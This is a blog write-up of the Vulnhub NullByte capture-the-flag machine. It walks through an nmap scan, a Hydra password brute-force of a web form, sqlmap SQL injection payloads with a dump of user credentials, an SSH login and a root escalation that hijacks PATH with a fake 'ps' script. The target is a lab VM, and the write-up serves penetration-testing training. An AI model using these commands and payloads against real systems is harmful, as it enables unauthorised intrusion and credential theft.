Mr_H4sh

Infosec, CTF and more

NullByte Solution

Hi guys,

this is my solution to the challenge of NullByte provided by ly0nx.

Thanks to Vulnhub for keeping me busy with all these challenges, and thanks to everyone that hosts new challenges.

This challenge involves various hacking techniques and privilege escalation.

First step: INFORMATION GATHERING

The description provided on Vulnhub says that the machine will have an IP assigned automatically, so this is the situation:

192.168.56.102 <== attacker
192.168.56.104 <== victim

A port scan on the victim host gives this:

# nmap -sT -p -v -n -Pn 192.168.56.104 -T5

Nmap scan report for 192.168.56.104
Host is up (0.00064s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
777/tcp   open  multiling-http
57606/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.26 seconds

Second step: VULNERABILITY SCAN

I try to fetch more information abusing the port 111 executing a portmap enumeration, but there’s nothing interesting in there.

I discover that port 777 is an SSH port, but the banner doesn’t provide so much information.

The port 80 is open, so I open a browser and I find this:

harmony-knowledge

I spider the application with Burp Suite and I find the directory /phpmyadmin, but any default login works.

I use nikto to check the web applications vulnerabilities, but there’s nothing so interesting.

I download the gif image and I execute exiftoof to check for some information, and I have some luck:

# exiftool main.gif 

ExifTool Version Number         : 9.74
File Name                       : main.gif
Directory                       : .
File Size                       : 16 kB
File Modification Date/Time     : 2015:12:26 12:31:46-05:00
File Access Date/Time           : 2015:12:26 12:31:57-05:00
File Inode Change Date/Time     : 2015:12:26 12:31:46-05:00
File Permissions                : rw-r--r--
File Type                       : GIF
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302

Third step: EXPLOITATION

I find out that kzMb5nVYJw is a path, so I go on http://192.168.56.104/kzMb5nVYJw and this is what I find:

key-login

The like 8 of the source code says this:

<!-- this form isn't connected to mysql, password ain't that complex -->

So I try with the common simple passwords (admin, password, 123456, god, etc…) but nothing works, I keep receiving the message invalid key, so I decide to bruteforce using Hydra

# hydra 192.168.56.104 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l ignore -P /usr/share/wordlists/rockyou.txt

[DATA] attacking service http-post-form on port 80
[80][http-post-form] host: 192.168.56.104   login: ignore   password: elite
1 of 1 target successfully completed, 1 valid password found

And this is the page that I find: search-username

Doing some tests I find out that the page is vulnerable to SQL Injection.

I use sqlmap to perform some tests, and this is the result:

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a

Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: usrtosearch=" AND 2018=2018#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: usrtosearch=" AND (SELECT * FROM (SELECT(SLEEP(5)))XPld)#

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=" UNION ALL SELECT CONCAT(0x716b717071,0x515a594a4265696e6a4b,0x7171626a71),NULL,NULL#
---
[09:43:31] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.12

Three SQL injections, so I go ahead finding the database, the tables and the users

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a --current-db

current database:    'seth'

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a -D seth --tables

[INFO] fetching tables for database: 'seth'
Database: seth
[1 table]
+-------+
| users |
+-------+

# sqlmap -u http://192.168.56.104/kzMb5nVYJw/420search.php?usrtosearch=a -D seth -T users --dump

[INFO] fetching columns for table 'users' in database 'seth'
[INFO] fetching entries for table 'users' in database 'seth'
[INFO] analyzing table dump for possible password hashes
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+

Cracking the password I find out that the hash YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE is the word omega

Fourth step: PRIVILEGE ESCALATION

At this point I SSH into the system:

# ssh ramses@192.168.56.104 -p 777
ramses@192.168.56.104's password: omega

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$ 

Superb, I’m in, but unfortunately the user ramses is not a sudoer. Thanks ly0nx, I thought it was easier xD

I check the history of the user, and I find something interesting:

$ cat .bash_history
sudo -s
su eric
exit
ls
clear
cd /var/www
cd backup/
ls
./procwatch 
clear
sudo -s
cd /
ls
exit

The user Ramses ran the script /var/www/backup/procwatch. I run it and I assume that the program is just running a ps command (list process) within the application and returning the output, as I can see from the program’s output. Since the file procwatch is owned by root, it will run high privilege commands. So I create a ps file within the /var/www/backup folder with the /bin/bash content and add the folder to the PATH variable:

ramses@NullByte:/var/www/backup$ echo '/bin/sh' > ps && chmod 777 ps
ramses@NullByte:/var/www/backup$ export PATH=/var/www/backup:${PATH}
ramses@NullByte:/var/www/backup$ ./procwatch 
# whoami 
root

Great, I’m root. Time to get the flag.

# ls -l /root
total 4
-rw-r--r-- 1 root root 1170 Aug  2 01:45 proof.txt
# cat /root/proof.txt
adf11c7a9e6523e630aaf3b9b7acb51d

It seems that you have pwned the box, congrats. 
Now you done that I wanna talk with you. Write a walk & mail at
xly0n@sigaint.org attach the walk and proof.txt
If sigaint.org is down you may mail at nbsly0n@gmail.com


USE THIS PGP PUBLIC KEY

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: BCPG C# v1.6.1.0

mQENBFW9BX8BCACVNFJtV4KeFa/TgJZgNefJQ+fD1+LNEGnv5rw3uSV+jWigpxrJ
Q3tO375S1KRrYxhHjEh0HKwTBCIopIcRFFRy1Qg9uW7cxYnTlDTp9QERuQ7hQOFT
e4QU3gZPd/VibPhzbJC/pdbDpuxqU8iKxqQr0VmTX6wIGwN8GlrnKr1/xhSRTprq
Cu7OyNC8+HKu/NpJ7j8mxDTLrvoD+hD21usssThXgZJ5a31iMWj4i0WUEKFN22KK
+z9pmlOJ5Xfhc2xx+WHtST53Ewk8D+Hjn+mh4s9/pjppdpMFUhr1poXPsI2HTWNe
YcvzcQHwzXj6hvtcXlJj+yzM2iEuRdIJ1r41ABEBAAG0EW5ic2x5MG5AZ21haWwu
Y29tiQEcBBABAgAGBQJVvQV/AAoJENDZ4VE7RHERJVkH/RUeh6qn116Lf5mAScNS
HhWTUulxIllPmnOPxB9/yk0j6fvWE9dDtcS9eFgKCthUQts7OFPhc3ilbYA2Fz7q
m7iAe97aW8pz3AeD6f6MX53Un70B3Z8yJFQbdusbQa1+MI2CCJL44Q/J5654vIGn
XQk6Oc7xWEgxLH+IjNQgh6V+MTce8fOp2SEVPcMZZuz2+XI9nrCV1dfAcwJJyF58
kjxYRRryD57olIyb9GsQgZkvPjHCg5JMdzQqOBoJZFPw/nNCEwQexWrgW7bqL/N8
TM2C0X57+ok7eqj8gUEuX/6FxBtYPpqUIaRT9kdeJPYHsiLJlZcXM0HZrPVvt1HU
Gms=
=PiAQ
-----END PGP PUBLIC KEY BLOCK-----

Conclusion

As usual, for any information or comment, please do not hesitate to leave a comment.

./A